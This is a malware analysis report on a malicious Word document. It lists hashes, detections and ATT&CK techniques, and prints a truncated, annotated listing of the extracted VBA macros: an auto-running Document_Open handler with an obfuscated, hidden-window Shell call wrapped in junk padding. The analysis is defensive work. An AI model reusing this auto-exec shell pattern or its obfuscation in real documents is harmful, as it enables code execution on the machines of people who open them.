Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6f4568a4eda133de…

MALICIOUS

Office (OLE)

171.0 KB Created: 2018-07-20 18:49:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: f07be8862b25e39fae180a4169578c62 SHA-1: 32d7b3e3eeb00277873d353c5bc21f67d3285376 SHA-256: 6f4568a4eda133de15e10f1302dae343c8584933c91c8aaa195ef373bc0de195
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file is a Microsoft Office Word document containing VBA macros: a Document_Open macro, which runs automatically when the document is opened, and inside it a critical Shell() call. This indicates the document is designed to execute arbitrary code on opening. The obfuscated VBA code (junk conditionals and meaningless identifiers) suggests an attempt to hide malicious activity, likely involving the download and execution of a secondary payload.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-6794284-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6794284-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is a standard OOXML schema namespace identifier found in ordinary Office documents, not a network indicator for this sample.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42003 bytes
SHA-256: fa8945136b7e856500fdffcfdc053d8d9f8a0ebcf05017db8a0c70eb6e9c6c4a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vUwdwkwHZAwSRz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst notes on the module header (as exported by olevba):
'   - VB_Name is a random-looking string rather than a descriptive module name,
'     consistent with the obfuscation noted elsewhere in this report.
'   - VB_Base = "1Normal.ThisDocument" marks this as the document's ThisDocument
'     class module, which is where Word looks for the Document_Open event
'     handler that appears further down in this listing.
' Dead-code padding: every If/ElseIf branch below is empty, nothing is assigned
' and no return value is set, so executing this function has no effect.
' None of the compared identifiers (FXzbRC, diXIu, ...) are declared anywhere in
' the visible listing, and no visible code calls this function. The same
' pattern recurs in VMIDtXiAj, TdlscjhE, qkVNKvw and rWjmDqGsBSG, and around
' the Shell() call inside Document_open.
Private Function ocDVzYTQSvXh()
' Suppresses any run-time error (e.g. from the undeclared names) so execution
' always falls through to End Function.
On Error Resume Next
   If FXzbRC <= 13 Then
      ElseIf diXIu > bZOOY Then
   End If
   If WzikI <= 13 Then
      ElseIf FEfYFq > vLSBq Then
   End If
   If JhpJc <= 13 Then
      ElseIf KLKjWV > LiMrrJ Then
   End If
   If zldrbG <= 13 Then
      ElseIf dwlvFS > wjvjNY Then
   End If
   If LvaPVj <= 13 Then
      ElseIf fvLvUz > OiNrwI Then
   End If
End Function
' Dead-code padding using arithmetic instead of empty branches: each guard tests
' an undeclared name against 2, and each expression result is stored in a name
' that is never read again. No visible code calls this function, and it sets no
' return value. The divisions (BsLEi / cwvGf, ...) would raise a run-time error
' if the operands are Empty/zero, which On Error Resume Next silences.
Private Function wVJSzwTVonG()
' Any error in the expressions below is swallowed and execution continues.
On Error Resume Next
   If GGMuUf = 2 Then
      wPuwmz = Clnih * PjEUjQ + 2346 + TSzqHl * (nYfVH * VmFqii + 90069 + kjDLsa + (BsLEi / cwvGf))
   End If
   If GfTwD = 2 Then
      mrjKNE = pLVvQ * ClEffj + 46435 + wWMYU * (hiEIB * HWpplj + 88007 + LtkZqn + (RBznR / GpVWls))
   End If
   If ApkEzF = 2 Then
      ADPXwn = jHvia * oUQpI + 97967 + ivzvQ * (LSdbc * WXCchf + 90520 + kpkbzz + (IjYvww / AFGUGa))
   End If
   If PNIMa = 2 Then
      utzdE = Gtjjvi * LjlfT + 33149 + ssqKkz * (pXXbr * rjfCOH + 43823 + GtMzb + (AZdho / zJBDpt))
   End If
   If rElQAi = 2 Then
      aKAlcp = ADcGdS * oYoNHw + 76762 + TdHCE * (ANrBjN * nUYqJ + 18167 + SMhdb + (CfzCt / FYrXda))
   End If
End Function
' Dead-code padding, same shape as ocDVzYTQSvXh: four If/ElseIf blocks with
' empty branches, no assignments, no return value. The identifiers are not
' declared in the visible listing and no visible code calls this function.
Private Function VMIDtXiAj()
' Errors from the undeclared names are suppressed; execution falls through.
On Error Resume Next
   If kWpBcW <= 13 Then
      ElseIf HFqAY > wKizA Then
   End If
   If uElzi <= 13 Then
      ElseIf JiVPt > mwnhic Then
   End If
   If CLHkj <= 13 Then
      ElseIf vhtVY > PbAtYB Then
   End If
   If Obozrz <= 13 Then
      ElseIf LvuJd > ikjWF Then
   End If
End Function
' Dead-code padding, same shape as ocDVzYTQSvXh: five If/ElseIf blocks with
' empty branches, no assignments, no return value. The identifiers are not
' declared in the visible listing and no visible code calls this function.
Private Function TdlscjhE()
' Errors from the undeclared names are suppressed; execution falls through.
On Error Resume Next
   If tpcKSn <= 13 Then
      ElseIf vXIjM > KcXuzb Then
   End If
   If iQqmF <= 13 Then
      ElseIf pAtdG > RGNfCJ Then
   End If
   If HKRpDQ <= 13 Then
      ElseIf ScJSjX > CcnEw Then
   End If
   If BzlmtO <= 13 Then
      ElseIf pWnYUf > komWw Then
   End If
   If dGWtL <= 13 Then
      ElseIf KSoAiA > UXjuz Then
   End If
End Function
' Auto-executing entry point: Word runs Document_Open when the document is
' opened with macros enabled, which is what the OLE_VBA_DOCOPEN finding refers
' to. The empty If/ElseIf blocks before and after the Shell() call are the same
' padding used in the Private Functions above; the only statement in this
' procedure that does anything is the VBA.Shell call.
Private Sub Document_open()
' A failed or erroring Shell() (or any error from the undeclared names) is
' silently ignored and the procedure still completes.
On Error Resume Next
   If aCYIW <= 13 Then
      ElseIf kcHaIS > iYbWX Then
   End If
   If hNKCGZ <= 13 Then
      ElseIf sivPMj > QRZPC Then
   End If
   If YsZiD <= 13 Then
      ElseIf CMFKR > DQWlb Then
   End If
' The command line is assembled at run time by concatenating variables
' (PbSXrfi, qTHVNsWCzur, ...). None of them is assigned anywhere in the visible
' listing and the only literal is "C", so the effective command cannot be
' recovered from this static view alone — it is presumably populated in the
' truncated remainder of the module or from document content; confirm with the
' full extraction or a sandbox run. The second argument, 0 (vbHide), starts the
' child process with a hidden window. From a detection standpoint the
' observable is a child process whose parent is the Word process.
VBA.Shell "" + PbSXrfi + qTHVNsWCzur + CVar("C") + LwmPNGCH + pfzijiiLO + BQiauS + zCkuMdz + dNZQB + BKiEwb + ufwLfjRkM + HIGZziIYbYd + tHCibYq + nkficCX + VcwPNkjuUv + HhmoJWLRs + XVGSqPJmTPjc + nDMjKjzuPCXctS, 0
   If QiBZb <= 13 Then
      ElseIf ilpuYK > wRPwiM Then
   End If
   If GuqEsC <= 13 Then
      ElseIf HsoQQt > bpuIdS Then
   End If
   If GrmdFD <= 13 Then
      ElseIf NVqZWJ > mECkRF Then
   End If
End Sub
' Dead-code padding, same shape as ocDVzYTQSvXh: five If/ElseIf blocks with
' empty branches, no assignments, no return value. The identifiers are not
' declared in the visible listing and no visible code calls this function.
Private Function qkVNKvw()
' Errors from the undeclared names are suppressed; execution falls through.
On Error Resume Next
   If PaLiK <= 13 Then
      ElseIf OiCTp > zAvov Then
   End If
   If FGzKCq <= 13 Then
      ElseIf BdAdzz > KGKlTw Then
   End If
   If jqhrkZ <= 13 Then
      ElseIf HtBVFj > iWIRvF Then
   End If
   If BXlZnY <= 13 Then
      ElseIf mvPEL > zjVoon Then
   End If
   If GBVGf <= 13 Then
      ElseIf mdHSwI > QoPlhS Then
   End If
End Function
' Dead-code padding, same shape as ocDVzYTQSvXh: six If/ElseIf blocks with
' empty branches, no assignments, no return value. The identifiers are not
' declared in the visible listing and no visible code calls this function.
Private Function rWjmDqGsBSG()
' Errors from the undeclared names are suppressed; execution falls through.
On Error Resume Next
   If MuajHU <= 13 Then
      ElseIf CqdURK > Wbjokz Then
   End If
   If iqflO <= 13 Then
      ElseIf jrcjT > rIKLmf Then
   End If
   If ikPDT <= 13 Then
      ElseIf SZwil > znmin Then
   End If
   If DcjbMf <= 13 Then
      ElseIf AiwwBn > moitJC Then
   End If
   If ispirf <= 13 Then
      ElseIf tFECXO > QGzwjZ Then
   End If
   If lsuzP <= 13 Then
      ElseIf zYbtL > QfGKF Then
   End If
End Function
Private Function vHcBotDZ()
On Error Resume Next
   If YtYwq <= 13 Then
      ElseIf nvLqR > ZNftX Then
   End If
   If LRZMAK <= 13 Then
      ElseIf TiqBfm > TPszh Then
   End If
   If OJsPk <= 13 Then
      ElseIf VFRVw > ozKnO Then
   End If
   If BFWJK <= 13 Then
      ElseIf jDk
... (truncated)